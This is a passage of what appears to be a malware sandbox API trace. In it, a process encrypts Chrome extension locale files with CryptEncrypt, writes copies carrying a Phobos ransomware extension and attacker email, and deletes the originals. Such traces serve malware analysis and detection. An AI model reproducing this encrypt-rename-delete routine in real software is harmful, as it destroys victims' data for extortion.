dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.376] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=222) returned 1 [0148.376] CloseHandle (hObject=0x188) returned 1 [0148.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json")) returned 0x2020 [0148.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.377] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.377] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.377] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.377] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.377] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xde, lpOverlapped=0x0) returned 1 [0148.378] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.378] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.379] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.379] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.379] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.379] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.379] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.380] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.380] CloseHandle (hObject=0x188) returned 1 [0148.380] CloseHandle (hObject=0x148) returned 1 [0148.380] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json")) returned 1 [0148.381] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.381] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=272) returned 1 [0148.381] CloseHandle (hObject=0x148) returned 1 [0148.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json")) returned 0x2020 [0148.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.382] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.382] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.382] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.382] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.382] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x110, lpOverlapped=0x0) returned 1 [0148.383] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0148.383] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0148.384] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.384] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.384] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.384] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.384] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.384] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.384] CloseHandle (hObject=0x148) returned 1 [0148.384] CloseHandle (hObject=0x188) returned 1 [0148.384] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json")) returned 1 [0148.385] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.386] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=227) returned 1 [0148.386] CloseHandle (hObject=0x188) returned 1 [0148.386] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json")) returned 0x2020 [0148.386] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.386] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.386] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.387] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.387] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.387] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe3, lpOverlapped=0x0) returned 1 [0148.388] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0148.388] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0148.388] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.388] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.388] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.389] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.389] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.389] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.389] CloseHandle (hObject=0x188) returned 1 [0148.389] CloseHandle (hObject=0x148) returned 1 [0148.389] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json")) returned 1 [0148.390] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.390] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=223) returned 1 [0148.390] CloseHandle (hObject=0x148) returned 1 [0148.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json")) returned 0x2020 [0148.391] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.391] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.391] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.391] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.391] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.391] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdf, lpOverlapped=0x0) returned 1 [0148.392] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.392] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.393] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.393] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.393] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.393] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.393] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.393] CloseHandle (hObject=0x148) returned 1 [0148.393] CloseHandle (hObject=0x188) returned 1 [0148.394] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json")) returned 1 [0148.395] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0148.461] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=260) returned 1 [0148.462] CloseHandle (hObject=0x134) returned 1 [0148.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json")) returned 0x2020 [0148.463] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0148.463] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.463] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.463] CreateFileW 